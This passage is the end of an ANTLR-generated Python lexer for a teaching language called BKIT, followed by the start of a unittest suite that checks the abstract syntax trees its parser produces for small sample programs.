buf.write(\"\\7a\\2\\2\\u0233\\u0234\\7k\\2\\2\\u0234\\u0235\\7p\\2\\2\\u0235\\u0236\")\n buf.write(\"\\7v\\2\\2\\u0236\\u00a2\\3\\2\\2\\2\\u0237\\u0238\\7h\\2\\2\\u0238\\u0239\")\n buf.write(\"\\7n\\2\\2\\u0239\\u023a\\7q\\2\\2\\u023a\\u023b\\7c\\2\\2\\u023b\\u023c\")\n buf.write(\"\\7v\\2\\2\\u023c\\u023d\\7a\\2\\2\\u023d\\u023e\\7q\\2\\2\\u023e\\u023f\")\n buf.write(\"\\7h\\2\\2\\u023f\\u0240\\7a\\2\\2\\u0240\\u0241\\7u\\2\\2\\u0241\\u0242\")\n buf.write(\"\\7v\\2\\2\\u0242\\u0243\\7t\\2\\2\\u0243\\u0244\\7k\\2\\2\\u0244\\u0245\")\n buf.write(\"\\7p\\2\\2\\u0245\\u0246\\7i\\2\\2\\u0246\\u00a4\\3\\2\\2\\2\\u0247\\u0248\")\n buf.write(\"\\7d\\2\\2\\u0248\\u0249\\7q\\2\\2\\u0249\\u024a\\7q\\2\\2\\u024a\\u024b\")\n buf.write(\"\\7n\\2\\2\\u024b\\u024c\\7a\\2\\2\\u024c\\u024d\\7q\\2\\2\\u024d\\u024e\")\n buf.write(\"\\7h\\2\\2\\u024e\\u024f\\7a\\2\\2\\u024f\\u0250\\7u\\2\\2\\u0250\\u0251\")\n buf.write(\"\\7v\\2\\2\\u0251\\u0252\\7t\\2\\2\\u0252\\u0253\\7k\\2\\2\\u0253\\u0254\")\n buf.write(\"\\7p\\2\\2\\u0254\\u0255\\7i\\2\\2\\u0255\\u00a6\\3\\2\\2\\2\\u0256\\u0257\")\n buf.write(\"\\7u\\2\\2\\u0257\\u0258\\7v\\2\\2\\u0258\\u0259\\7t\\2\\2\\u0259\\u025a\")\n buf.write(\"\\7k\\2\\2\\u025a\\u025b\\7p\\2\\2\\u025b\\u025c\\7i\\2\\2\\u025c\\u025d\")\n buf.write(\"\\7a\\2\\2\\u025d\\u025e\\7q\\2\\2\\u025e\\u025f\\7h\\2\\2\\u025f\\u0260\")\n buf.write(\"\\7a\\2\\2\\u0260\\u0261\\7d\\2\\2\\u0261\\u0262\\7q\\2\\2\\u0262\\u0263\")\n buf.write(\"\\7q\\2\\2\\u0263\\u0264\\7n\\2\\2\\u0264\\u00a8\\3\\2\\2\\2\\u0265\\u0266\")\n buf.write(\"\\7u\\2\\2\\u0266\\u0267\\7v\\2\\2\\u0267\\u0268\\7t\\2\\2\\u0268\\u0269\")\n buf.write(\"\\7k\\2\\2\\u0269\\u026a\\7p\\2\\2\\u026a\\u026b\\7i\\2\\2\\u026b\\u026c\")\n buf.write(\"\\7a\\2\\2\\u026c\\u026d\\7q\\2\\2\\u026d\\u026e\\7h\\2\\2\\u026e\\u026f\")\n buf.write(\"\\7a\\2\\2\\u026f\\u0270\\7k\\2\\2\\u0270\\u0271\\7p\\2\\2\\u0271\\u0272\")\n buf.write(\"\\7v\\2\\2\\u0272\\u00aa\\3\\2\\2\\2\\u0273\\u0274\\7u\\2\\2\\u0274\\u0275\")\n buf.write(\"\\7v\\2\\2\\u0275\\u0276\\7t\\2\\2\\u0276\\u0277\\7k\\2\\2\\u0277\\u0278\")\n buf.write(\"\\7p\\2\\2\\u0278\\u0279\\7i\\2\\2\\u0279\\u027a\\7a\\2\\2\\u027a\\u027b\")\n buf.write(\"\\7q\\2\\2\\u027b\\u027c\\7h\\2\\2\\u027c\\u027d\\7a\\2\\2\\u027d\\u027e\")\n buf.write(\"\\7h\\2\\2\\u027e\\u027f\\7n\\2\\2\\u027f\\u0280\\7q\\2\\2\\u0280\\u0281\")\n buf.write(\"\\7c\\2\\2\\u0281\\u0282\\7v\\2\\2\\u0282\\u00ac\\3\\2\\2\\2\\u0283\\u0284\")\n buf.write(\"\\7,\\2\\2\\u0284\\u0285\\7,\\2\\2\\u0285\\u0289\\3\\2\\2\\2\\u0286\\u0288\")\n buf.write(\"\\13\\2\\2\\2\\u0287\\u0286\\3\\2\\2\\2\\u0288\\u028b\\3\\2\\2\\2\\u0289\")\n buf.write(\"\\u028a\\3\\2\\2\\2\\u0289\\u0287\\3\\2\\2\\2\\u028a\\u028c\\3\\2\\2\\2\")\n buf.write(\"\\u028b\\u0289\\3\\2\\2\\2\\u028c\\u028d\\7,\\2\\2\\u028d\\u028e\\7\")\n buf.write(\",\\2\\2\\u028e\\u028f\\3\\2\\2\\2\\u028f\\u0290\\bW\\3\\2\\u0290\\u00ae\")\n buf.write(\"\\3\\2\\2\\2\\u0291\\u0293\\t\\17\\2\\2\\u0292\\u0291\\3\\2\\2\\2\\u0293\")\n buf.write(\"\\u0294\\3\\2\\2\\2\\u0294\\u0292\\3\\2\\2\\2\\u0294\\u0295\\3\\2\\2\\2\")\n buf.write(\"\\u0295\\u0296\\3\\2\\2\\2\\u0296\\u0297\\bX\\3\\2\\u0297\\u00b0\\3\")\n buf.write(\"\\2\\2\\2\\u0298\\u029c\\7$\\2\\2\\u0299\\u029b\\5\\31\\r\\2\\u029a\\u0299\")\n buf.write(\"\\3\\2\\2\\2\\u029b\\u029e\\3\\2\\2\\2\\u029c\\u029a\\3\\2\\2\\2\\u029c\")\n buf.write(\"\\u029d\\3\\2\\2\\2\\u029d\\u029f\\3\\2\\2\\2\\u029e\\u029c\\3\\2\\2\\2\")\n buf.write(\"\\u029f\\u02a0\\5\\23\\n\\2\\u02a0\\u02a1\\bY\\4\\2\\u02a1\\u00b2\\3\")\n buf.write(\"\\2\\2\\2\\u02a2\\u02a6\\7$\\2\\2\\u02a3\\u02a5\\5\\31\\r\\2\\u02a4\\u02a3\")\n buf.write(\"\\3\\2\\2\\2\\u02a5\\u02a8\\3\\2\\2\\2\\u02a6\\u02a4\\3\\2\\2\\2\\u02a6\")\n buf.write(\"\\u02a7\\3\\2\\2\\2\\u02a7\\u02aa\\3\\2\\2\\2\\u02a8\\u02a6\\3\\2\\2\\2\")\n buf.write(\"\\u02a9\\u02ab\\t\\20\\2\\2\\u02aa\\u02a9\\3\\2\\2\\2\\u02ab\\u02ac\")\n buf.write(\"\\3\\2\\2\\2\\u02ac\\u02ad\\bZ\\5\\2\\u02ad\\u00b4\\3\\2\\2\\2\\u02ae\")\n buf.write(\"\\u02af\\7,\\2\\2\\u02af\\u02b0\\7,\\2\\2\\u02b0\\u02b6\\3\\2\\2\\2\\u02b1\")\n buf.write(\"\\u02b2\\7,\\2\\2\\u02b2\\u02b5\\n\\21\\2\\2\\u02b3\\u02b5\\n\\21\\2\")\n buf.write(\"\\2\\u02b4\\u02b1\\3\\2\\2\\2\\u02b4\\u02b3\\3\\2\\2\\2\\u02b5\\u02b8\")\n buf.write(\"\\3\\2\\2\\2\\u02b6\\u02b7\\3\\2\\2\\2\\u02b6\\u02b4\\3\\2\\2\\2\\u02b7\")\n buf.write(\"\\u02b9\\3\\2\\2\\2\\u02b8\\u02b6\\3\\2\\2\\2\\u02b9\\u02ba\\7\\2\\2\\3\")\n buf.write(\"\\u02ba\\u00b6\\3\\2\\2\\2\\u02bb\\u02bc\\13\\2\\2\\2\\u02bc\\u00b8\")\n buf.write(\"\\3\\2\\2\\2\\35\\2\\u00be\\u00c0\\u00cb\\u00d0\\u00d5\\u00db\\u00e1\")\n buf.write(\"\\u00e5\\u00e8\\u00f6\\u0100\\u0106\\u010e\\u0111\\u0117\\u011d\")\n buf.write(\"\\u0123\\u0129\\u012f\\u0289\\u0294\\u029c\\u02a6\\u02aa\\u02b4\")\n buf.write(\"\\u02b6\\6\\3\\26\\2\\b\\2\\2\\3Y\\3\\3Z\\4\")\n return buf.getvalue()\n\n\nclass BKITLexer(Lexer):\n\n atn = ATNDeserializer().deserialize(serializedATN())\n\n decisionsToDFA = [ DFA(ds, i) for i, ds in enumerate(atn.decisionToState) ]\n\n ID = 1\n INT_LIT = 2\n FLOAT_LIT = 3\n BOOL_LIT = 4\n STRING_LIT = 5\n BODY = 6\n BREAK = 7\n CONTINUE = 8\n DO = 9\n ELSE = 10\n ELSEIF = 11\n ENDIF = 12\n ENDBODY = 13\n ENDFOR = 14\n ENDWHILE = 15\n FOR = 16\n FUNCTION = 17\n IF = 18\n PARAMETER = 19\n RETURN = 20\n THEN = 21\n VAR = 22\n WHILE = 23\n TRUE = 24\n FALSE = 25\n ENDDO = 26\n PLUS_INT = 27\n PLUS_FLOAT = 28\n MINUS_INT = 29\n MINUS_FLOAT = 30\n STAR_INT = 31\n STAR_FLOAT = 32\n DIV_INT = 33\n DIV_FLOAT = 34\n MOD = 35\n NOT = 36\n AND = 37\n OR = 38\n EQUAL = 39\n NOT_EQUAL_INT = 40\n LESS_INT = 41\n GREATER_INT = 42\n LESS_OR_EQUAL_INT = 43\n GREATER_OR_EQUAL_INT = 44\n NOT_EQUAL_FLOAT = 45\n LESS_FLOAT = 46\n GREATER_FLOAT = 47\n LESS_OR_EQUAL_FLOAT = 48\n GREATER_OR_EQUAL_FLOAT = 49\n LEFT_PAREN = 50\n RIGHT_PAREN = 51\n LEFT_BRACKET = 52\n RIGHT_BRACKET = 53\n LEFT_BRACE = 54\n RIGHT_BRACE = 55\n COLON = 56\n DOT = 57\n SEMI = 58\n COMMA = 59\n ASSIGN = 60\n DOUBLE_QUOTE = 61\n INT_OF_FLOAT = 62\n INT_OF_STRING = 63\n FLOAT_TO_INT = 64\n FLOAT_OF_STRING = 65\n BOOL_OF_STRING = 66\n STRING_OF_BOOL = 67\n STRING_OF_INT = 68\n STRING_OF_FLOAT = 69\n COMMENT = 70\n WS = 71\n ILLEGAL_ESCAPE = 72\n UNCLOSE_STRING = 73\n UNTERMINATED_COMMENT = 74\n ERROR_CHAR = 75\n\n channelNames = [ u\"DEFAULT_TOKEN_CHANNEL\", u\"HIDDEN\" ]\n\n modeNames = [ \"DEFAULT_MODE\" ]\n\n literalNames = [ \"<INVALID>\",\n \"'Body'\", \"'Break'\", \"'Continue'\", \"'Do'\", \"'Else'\", \"'ElseIf'\", \n \"'EndIf'\", \"'EndBody'\", \"'EndFor'\", \"'EndWhile'\", \"'For'\", \"'Function'\", \n \"'If'\", \"'Parameter'\", \"'Return'\", \"'Then'\", \"'Var'\", \"'While'\", \n \"'True'\", \"'False'\", \"'EndDo'\", \"'+'\", \"'+.'\", \"'-'\", \"'-.'\", \n \"'*'\", \"'*.'\", \"'\\\\'\", \"'\\\\.'\", \"'%'\", \"'!'\", \"'&&'\", \"'||'\", \n \"'=='\", \"'!='\", \"'<'\", \"'>'\", \"'<='\", \"'>='\", \"'=/='\", \"'<.'\", \n \"'>.'\", \"'<=.'\", \"'>=.'\", \"'('\", \"')'\", \"'['\", \"']'\", \"'{'\", \n \"'}'\", \"':'\", \"'.'\", \"';'\", \"','\", \"'='\", \"'\\\"'\", \"'int_of_float'\", \n \"'int_of_string'\", \"'float_to_int'\", \"'float_of_string'\", \"'bool_of_string'\", \n \"'string_of_bool'\", \"'string_of_int'\", \"'string_of_float'\" ]\n\n symbolicNames = [ \"<INVALID>\",\n \"ID\", \"INT_LIT\", \"FLOAT_LIT\", \"BOOL_LIT\", \"STRING_LIT\", \"BODY\", \n \"BREAK\", \"CONTINUE\", \"DO\", \"ELSE\", \"ELSEIF\", \"ENDIF\", \"ENDBODY\", \n \"ENDFOR\", \"ENDWHILE\", \"FOR\", \"FUNCTION\", \"IF\", \"PARAMETER\", \n \"RETURN\", \"THEN\", \"VAR\", \"WHILE\", \"TRUE\", \"FALSE\", \"ENDDO\", \n \"PLUS_INT\", \"PLUS_FLOAT\", \"MINUS_INT\", \"MINUS_FLOAT\", \"STAR_INT\", \n \"STAR_FLOAT\", \"DIV_INT\", \"DIV_FLOAT\", \"MOD\", \"NOT\", \"AND\", \"OR\", \n \"EQUAL\", \"NOT_EQUAL_INT\", \"LESS_INT\", \"GREATER_INT\", \"LESS_OR_EQUAL_INT\", \n \"GREATER_OR_EQUAL_INT\", \"NOT_EQUAL_FLOAT\", \"LESS_FLOAT\", \"GREATER_FLOAT\", \n \"LESS_OR_EQUAL_FLOAT\", \"GREATER_OR_EQUAL_FLOAT\", \"LEFT_PAREN\", \n \"RIGHT_PAREN\", \"LEFT_BRACKET\", \"RIGHT_BRACKET\", \"LEFT_BRACE\", \n \"RIGHT_BRACE\", \"COLON\", \"DOT\", \"SEMI\", \"COMMA\", \"ASSIGN\", \"DOUBLE_QUOTE\", \n \"INT_OF_FLOAT\", \"INT_OF_STRING\", \"FLOAT_TO_INT\", \"FLOAT_OF_STRING\", \n \"BOOL_OF_STRING\", \"STRING_OF_BOOL\", \"STRING_OF_INT\", \"STRING_OF_FLOAT\", \n \"COMMENT\", \"WS\", \"ILLEGAL_ESCAPE\", \"UNCLOSE_STRING\", \"UNTERMINATED_COMMENT\", \n \"ERROR_CHAR\" ]\n\n ruleNames = [ \"ID\", \"LOWERCASE_LETTER\", \"UPPERCASE_LETTER\", \"DIGIT\", \n \"LETTER\", \"SCIENTIFIC\", \"DECIMAL_POINT\", \"FLOATING_POINT_NUM\", \n \"ILL_ESC_SEQUENCE\", \"SUP_ESC_SEQUENCE\", \"DOUBLE_QUOTE_IN_STRING\", \n \"STRING_CHAR\", \"HEXADECIMALDIGIT\", \"OCTALDIGIT\", \"HEXADECIMAL\", \n \"DECIMAL\", \"OCTAL\", \"INT_LIT\", \"FLOAT_LIT\", \"BOOL_LIT\", \n \"STRING_LIT\", \"BODY\", \"BREAK\", \"CONTINUE\", \"DO\", \"ELSE\", \n \"ELSEIF\", \"ENDIF\", \"ENDBODY\", \"ENDFOR\", \"ENDWHILE\", \"FOR\", \n \"FUNCTION\", \"IF\", \"PARAMETER\", \"RETURN\", \"THEN\", \"VAR\", \n \"WHILE\", \"TRUE\", \"FALSE\", \"ENDDO\", \"PLUS_INT\", \"PLUS_FLOAT\", \n \"MINUS_INT\", \"MINUS_FLOAT\", \"STAR_INT\", \"STAR_FLOAT\", \n \"DIV_INT\", \"DIV_FLOAT\", \"MOD\", \"NOT\", \"AND\", \"OR\", \"EQUAL\", \n \"NOT_EQUAL_INT\", \"LESS_INT\", \"GREATER_INT\", \"LESS_OR_EQUAL_INT\", \n \"GREATER_OR_EQUAL_INT\", \"NOT_EQUAL_FLOAT\", \"LESS_FLOAT\", \n \"GREATER_FLOAT\", \"LESS_OR_EQUAL_FLOAT\", \"GREATER_OR_EQUAL_FLOAT\", \n \"LEFT_PAREN\", \"RIGHT_PAREN\", \"LEFT_BRACKET\", \"RIGHT_BRACKET\", \n \"LEFT_BRACE\", \"RIGHT_BRACE\", \"COLON\", \"DOT\", \"SEMI\", \"COMMA\", \n \"ASSIGN\", \"DOUBLE_QUOTE\", \"INT_OF_FLOAT\", \"INT_OF_STRING\", \n \"FLOAT_TO_INT\", \"FLOAT_OF_STRING\", \"BOOL_OF_STRING\", \"STRING_OF_BOOL\", \n \"STRING_OF_INT\", \"STRING_OF_FLOAT\", \"COMMENT\", \"WS\", \"ILLEGAL_ESCAPE\", \n \"UNCLOSE_STRING\", \"UNTERMINATED_COMMENT\", \"ERROR_CHAR\" ]\n\n grammarFileName = \"BKIT.g4\"\n\n def __init__(self, input=None, output:TextIO = sys.stdout):\n super().__init__(input, output)\n self.checkVersion(\"4.8\")\n self._interp = LexerATNSimulator(self, self.atn, self.decisionsToDFA, PredictionContextCache())\n self._actions = None\n self._predicates = None\n\n\n def emit(self):\n tk = self.type\n result = super().emit()\n if tk == self.UNCLOSE_STRING: \n raise UncloseString(result.text)\n elif tk == self.ILLEGAL_ESCAPE:\n raise IllegalEscape(result.text)\n elif tk == self.ERROR_CHAR:\n raise ErrorToken(result.text)\n elif tk == self.UNTERMINATED_COMMENT:\n raise UnterminatedComment()\n else:\n return result;\n\n\n def action(self, localctx:RuleContext, ruleIndex:int, actionIndex:int):\n if self._actions is None:\n actions = dict()\n actions[20] = self.STRING_LIT_action \n actions[87] = self.ILLEGAL_ESCAPE_action \n actions[88] = self.UNCLOSE_STRING_action \n self._actions = actions\n action = self._actions.get(ruleIndex, None)\n if action is not None:\n action(localctx, actionIndex)\n else:\n raise Exception(\"No registered action for:\" + str(ruleIndex))\n\n\n def STRING_LIT_action(self, localctx:RuleContext , actionIndex:int):\n if actionIndex == 0:\n\n y = str(self.text)\n self.text = y[1:-1]\n \n \n\n def ILLEGAL_ESCAPE_action(self, localctx:RuleContext , actionIndex:int):\n if actionIndex == 1:\n\n y = str(self.text)\n self.text = y[1:]\n \n \n\n def UNCLOSE_STRING_action(self, localctx:RuleContext , actionIndex:int):\n if actionIndex == 2:\n\n y = str(self.text)\n self.text = y[1:]\n \n \n\n\n" }, { "alpha_fraction": 0.5319401621818542, "alphanum_fraction": 0.5630597472190857, "avg_line_length": 54.583839416503906, "blob_id": "e072eb057c63e5874ad73e9d29c8a099e0b1df1a", "content_id": "85720ef03b93a8d77e6d46ab4c3596bf63bba84d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 63979, "license_type": "no_license", "max_line_length": 705, "num_lines": 1151, "path": "/Assignments/assignment2/src1.1/test/ASTGenSuite.py", "repo_name": "signofthefour/PPL", "src_encoding": "UTF-8", "text": "\nimport unittest\nfrom TestUtils import TestAST\nfrom AST import *\n\nclass ASTGenSuite(unittest.TestCase):\n \n\tdef test_348(self):\n\t\tinput = \"\"\"Var: a,b,c;\nFunction: main\nParameter: a\nBody:\nDo something(); While a && bool_of_string(\"True\") EndDo.\nEndBody.\"\"\"\n\t\texpect = Program([VarDecl(Id('a'),[],None),VarDecl(Id('b'),[],None),VarDecl(Id('c'),[],None),FuncDecl(Id('main'),[VarDecl(Id('a'),[],None)],([],[Dowhile(([],[CallStmt(Id('something'),[])]),BinaryOp(\"\"\"&&\"\"\",Id('a'),CallExpr(Id('bool_of_string'),[StringLiteral(\"\"\"True\"\"\")])))]))])\n\t\tself.assertTrue(TestAST.checkASTGen(input,expect,348))\n\n\tdef test_304(self):\n\t\tinput = \"\"\"Var:x[1] = {1};\"\"\"\n\t\texpect = Program([VarDecl(Id('x'),[1],ArrayLiteral([IntLiteral(1)]))])\n\t\tself.assertTrue(TestAST.checkASTGen(input,expect,304))\n\n\tdef test_311(self):\n\t\tinput = \"\"\"Var: a,b,c;\n Function: main\n Parameter: a\n Body:\n EndBody.\"\"\"\n\t\texpect = Program([VarDecl(Id('a'),[],None),VarDecl(Id('b'),[],None),VarDecl(Id('c'),[],None),FuncDecl(Id('main'),[VarDecl(Id('a'),[],None)],([],[]))])\n\t\tself.assertTrue(TestAST.checkASTGen(input,expect,311))\n\n\tdef test_333(self):\n\t\tinput = \"\"\"Var: a,b,c;\nFunction: main\nParameter: a\nBody:\nVar: x=1,a[1]={12, \"asdf\"},a={12,12.e5,True,0x12};\nFor (i=1, i<3, 2) Do something(); EndFor.\nEndBody.\"\"\"\n\t\texpect = Program([VarDecl(Id('a'),[],None),VarDecl(Id('b'),[],None),VarDecl(Id('c'),[],None),FuncDecl(Id('main'),[VarDecl(Id('a'),[],None)],([VarDecl(Id('x'),[],IntLiteral(1)),VarDecl(Id('a'),[1],ArrayLiteral([IntLiteral(12),StringLiteral(\"\"\"asdf\"\"\")])),VarDecl(Id('a'),[],ArrayLiteral([IntLiteral(12),FloatLiteral(1200000.0),BooleanLiteral(True),IntLiteral(18)]))],[For(Id('i'),IntLiteral(1),BinaryOp(\"\"\"<\"\"\",Id('i'),IntLiteral(3)),IntLiteral(2),([],[CallStmt(Id('something'),[])]))]))])\n\t\tself.assertTrue(TestAST.checkASTGen(input,expect,333))\n\n\tdef test_372(self):\n\t\tinput = \"\"\"Var: a,b,c;\nFunction: main\nBody:\na = b[something()[a[1]] + 1][c + d < 1] + c *. d[1.][21 * 0x21A];\nEndBody.\"\"\"\n\t\texpect = Program([VarDecl(Id('a'),[],None),VarDecl(Id('b'),[],None),VarDecl(Id('c'),[],None),FuncDecl(Id('main'),[],([],[Assign(Id('a'),BinaryOp(\"\"\"+\"\"\",ArrayCell(Id('b'),[BinaryOp(\"\"\"+\"\"\",ArrayCell(CallExpr(Id('something'),[]),[ArrayCell(Id('a'),[IntLiteral(1)])]),IntLiteral(1)),BinaryOp(\"\"\"<\"\"\",BinaryOp(\"\"\"+\"\"\",Id('c'),Id('d')),IntLiteral(1))]),BinaryOp(\"\"\"*.\"\"\",Id('c'),ArrayCell(Id('d'),[FloatLiteral(1.0),BinaryOp(\"\"\"*\"\"\",IntLiteral(21),IntLiteral(538))]))))]))])\n\t\tself.assertTrue(TestAST.checkASTGen(input,expect,372))\n\n\tdef test_381(self):\n\t\tinput = \"\"\"Function: main\nParameter: a, b[1][100]\nBody:\nWhile a<b Do\nIf a > b Then doNothing(); Break;\nElseIf !somecon() Then doSomething();\nElse Do something(); While a + foo()[100] EndDo.\nEndIf.\nEndWhile.\nEndBody.\"\"\"\n\t\texpect = Program([FuncDecl(Id('main'),[VarDecl(Id('a'),[],None),VarDecl(Id('b'),[1,100],None)],([],[While(BinaryOp(\"\"\"<\"\"\",Id('a'),Id('b')),([],[If([(BinaryOp(\"\"\">\"\"\",Id('a'),Id('b')),[],[CallStmt(Id('doNothing'),[]),Break()]),(UnaryOp(\"\"\"!\"\"\",CallExpr(Id('somecon'),[])),[],[CallStmt(Id('doSomething'),[])])],([],[Dowhile(([],[CallStmt(Id('something'),[])]),BinaryOp(\"\"\"+\"\"\",Id('a'),ArrayCell(CallExpr(Id('foo'),[]),[IntLiteral(100)])))]))]))]))])\n\t\tself.assertTrue(TestAST.checkASTGen(input,expect,381))\n\n\tdef test_395(self):\n\t\tinput = \"\"\"Var: a,b,c;\n Function: main\n Parameter: a, a[1][12]\n Body:\n If expr Then \n ElseIf expr Then\n While expr Do EndWhile.\n Do Return; While {{}} EndDo.\n Else\n EndIf.\n EndBody.\"\"\"\n\t\texpect = Program([VarDecl(Id('a'),[],None),VarDecl(Id('b'),[],None),VarDecl(Id('c'),[],None),FuncDecl(Id('main'),[VarDecl(Id('a'),[],None),VarDecl(Id('a'),[1,12],None)],([],[If([(Id('expr'),[],[]),(Id('expr'),[],[While(Id('expr'),([],[])),Dowhile(([],[Return(None)]),ArrayLiteral([ArrayLiteral([])]))])],([],[]))]))])\n\t\tself.assertTrue(TestAST.checkASTGen(input,expect,395))\n\n\tdef test_339(self):\n\t\tinput = \"\"\"Var: a,b,c;\n Function: main\n Parameter: a\n Body:\n Var: x=1,a[1]={12, \"asdf\"},a={12,12.e5,True,0x12};\n For (i = 0x12, a < 2, i + foo() + 1) Do something();\n c = a[23][b[1][2][c]] +. 12; \n EndFor.\n EndBody.\"\"\"\n\t\texpect = Program([VarDecl(Id('a'),[],None),VarDecl(Id('b'),[],None),VarDecl(Id('c'),[],None),FuncDecl(Id('main'),[VarDecl(Id('a'),[],None)],([VarDecl(Id('x'),[],IntLiteral(1)),VarDecl(Id('a'),[1],ArrayLiteral([IntLiteral(12),StringLiteral(\"\"\"asdf\"\"\")])),VarDecl(Id('a'),[],ArrayLiteral([IntLiteral(12),FloatLiteral(1200000.0),BooleanLiteral(True),IntLiteral(18)]))],[For(Id('i'),IntLiteral(18),BinaryOp(\"\"\"<\"\"\",Id('a'),IntLiteral(2)),BinaryOp(\"\"\"+\"\"\",BinaryOp(\"\"\"+\"\"\",Id('i'),CallExpr(Id('foo'),[])),IntLiteral(1)),([],[CallStmt(Id('something'),[]),Assign(Id('c'),BinaryOp(\"\"\"+.\"\"\",ArrayCell(Id('a'),[IntLiteral(23),ArrayCell(Id('b'),[IntLiteral(1),IntLiteral(2),Id('c')])]),IntLiteral(12)))]))]))])\n\t\tself.assertTrue(TestAST.checkASTGen(input,expect,339))\n\n\tdef test_317(self):\n\t\tinput = \"\"\"Var: a,b,c;\n Function: main\n Body:\n Var: x=1,a[1]=1;\n Var: a,b[1]={\"this\"};\n EndBody.\"\"\"\n\t\texpect = Program([VarDecl(Id('a'),[],None),VarDecl(Id('b'),[],None),VarDecl(Id('c'),[],None),FuncDecl(Id('main'),[],([VarDecl(Id('x'),[],IntLiteral(1)),VarDecl(Id('a'),[1],IntLiteral(1)),VarDecl(Id('a'),[],None),VarDecl(Id('b'),[1],ArrayLiteral([StringLiteral(\"\"\"this\"\"\")]))],[]))])\n\t\tself.assertTrue(TestAST.checkASTGen(input,expect,317))\n\n\tdef test_390(self):\n\t\tinput = \"\"\"Var: a,b,c;\nFunction: main\nParameter: a\nBody:\nfoo(1+a, b, c)[something][whatever] = 12;\nEndBody.\"\"\"\n\t\texpect = Program([VarDecl(Id('a'),[],None),VarDecl(Id('b'),[],None),VarDecl(Id('c'),[],None),FuncDecl(Id('main'),[VarDecl(Id('a'),[],None)],([],[Assign(ArrayCell(CallExpr(Id('foo'),[BinaryOp(\"\"\"+\"\"\",IntLiteral(1),Id('a')),Id('b'),Id('c')]),[Id('something'),Id('whatever')]),IntLiteral(12))]))])\n\t\tself.assertTrue(TestAST.checkASTGen(input,expect,390))\n\n\tdef test_330(self):\n\t\tinput = \"\"\"Var: a,b,c;\n Function: main\n Parameter: a\n Body:\n Var: x=1,a[1]={12, \"asdf\"},a={12,12.e5,True,0x12};\n If a == True Then\n EndIf.\n EndBody.\"\"\"\n\t\texpect = Program([VarDecl(Id('a'),[],None),VarDecl(Id('b'),[],None),VarDecl(Id('c'),[],None),FuncDecl(Id('main'),[VarDecl(Id('a'),[],None)],([VarDecl(Id('x'),[],IntLiteral(1)),VarDecl(Id('a'),[1],ArrayLiteral([IntLiteral(12),StringLiteral(\"\"\"asdf\"\"\")])),VarDecl(Id('a'),[],ArrayLiteral([IntLiteral(12),FloatLiteral(1200000.0),BooleanLiteral(True),IntLiteral(18)]))],[If([(BinaryOp(\"\"\"==\"\"\",Id('a'),BooleanLiteral(True)),[],[])],[])]))])\n\t\tself.assertTrue(TestAST.checkASTGen(input,expect,330))\n\n\tdef test_318(self):\n\t\tinput = \"\"\"Var: a,b,c;\n Function: main\n Parameter: a\n Body:\n Var: x=1,a[1]=1;\n Var: a,b[1]={\"this\"};\n EndBody.\"\"\"\n\t\texpect = Program([VarDecl(Id('a'),[],None),VarDecl(Id('b'),[],None),VarDecl(Id('c'),[],None),FuncDecl(Id('main'),[VarDecl(Id('a'),[],None)],([VarDecl(Id('x'),[],IntLiteral(1)),VarDecl(Id('a'),[1],IntLiteral(1)),VarDecl(Id('a'),[],None),VarDecl(Id('b'),[1],ArrayLiteral([StringLiteral(\"\"\"this\"\"\")]))],[]))])\n\t\tself.assertTrue(TestAST.checkASTGen(input,expect,318))\n\n\tdef test_345(self):\n\t\tinput = \"\"\"Var: a,b,c;\n Function: main\n Parameter: a\n Body:\n Do something(); While !(abc < 12 || b && True) EndDo.\n EndBody.\"\"\"\n\t\texpect = Program([VarDecl(Id('a'),[],None),VarDecl(Id('b'),[],None),VarDecl(Id('c'),[],None),FuncDecl(Id('main'),[VarDecl(Id('a'),[],None)],([],[Dowhile(([],[CallStmt(Id('something'),[])]),UnaryOp(\"\"\"!\"\"\",BinaryOp(\"\"\"<\"\"\",Id('abc'),BinaryOp(\"\"\"&&\"\"\",BinaryOp(\"\"\"||\"\"\",IntLiteral(12),Id('b')),BooleanLiteral(True)))))]))])\n\t\tself.assertTrue(TestAST.checkASTGen(input,expect,345))\n\n\tdef test_358(self):\n\t\tinput = \"\"\"Var: a,b,c;\n Function: main\n Body:\n foo(arg1, \"???\", foo(nothing));\n EndBody.\"\"\"\n\t\texpect = Program([VarDecl(Id('a'),[],None),VarDecl(Id('b'),[],None),VarDecl(Id('c'),[],None),FuncDecl(Id('main'),[],([],[CallStmt(Id('foo'),[Id('arg1'),StringLiteral(\"\"\"???\"\"\"),CallExpr(Id('foo'),[Id('nothing')])])]))])\n\t\tself.assertTrue(TestAST.checkASTGen(input,expect,358))\n\n\tdef test_310(self):\n\t\tinput = \"\"\"Var:x[1] = {1,2,3,4};\"\"\"\n\t\texpect = Program([VarDecl(Id('x'),[1],ArrayLiteral([IntLiteral(1),IntLiteral(2),IntLiteral(3),IntLiteral(4)]))])\n\t\tself.assertTrue(TestAST.checkASTGen(input,expect,310))\n\n\tdef test_322(self):\n\t\tinput = \"\"\"Function: main\n Parameter: a\n Body:\n If 1 Then\n EndIf.\n EndBody.\"\"\"\n\t\texpect = Program([FuncDecl(Id('main'),[VarDecl(Id('a'),[],None)],([],[If([(IntLiteral(1),[],[])],[])]))])\n\t\tself.assertTrue(TestAST.checkASTGen(input,expect,322))\n\n\tdef test_369(self):\n\t\tinput = \"\"\"Var: a,b,c;\n Function: main\n Body:\n a = b[something()[a[1]] + 1][c + d < 1];\n EndBody.\"\"\"\n\t\texpect = Program([VarDecl(Id('a'),[],None),VarDecl(Id('b'),[],None),VarDecl(Id('c'),[],None),FuncDecl(Id('main'),[],([],[Assign(Id('a'),ArrayCell(Id('b'),[BinaryOp(\"\"\"+\"\"\",ArrayCell(CallExpr(Id('something'),[]),[ArrayCell(Id('a'),[IntLiteral(1)])]),IntLiteral(1)),BinaryOp(\"\"\"<\"\"\",BinaryOp(\"\"\"+\"\"\",Id('c'),Id('d')),IntLiteral(1))]))]))])\n\t\tself.assertTrue(TestAST.checkASTGen(input,expect,369))\n\n\tdef test_325(self):\n\t\tinput = \"\"\"Var: a,b,c;\nFunction: main\nParameter: a\nBody:\nVar: x=1,a[1]=1;\nVar: a,b[1]={\"this\"};\nEndBody.\"\"\"\n\t\texpect = 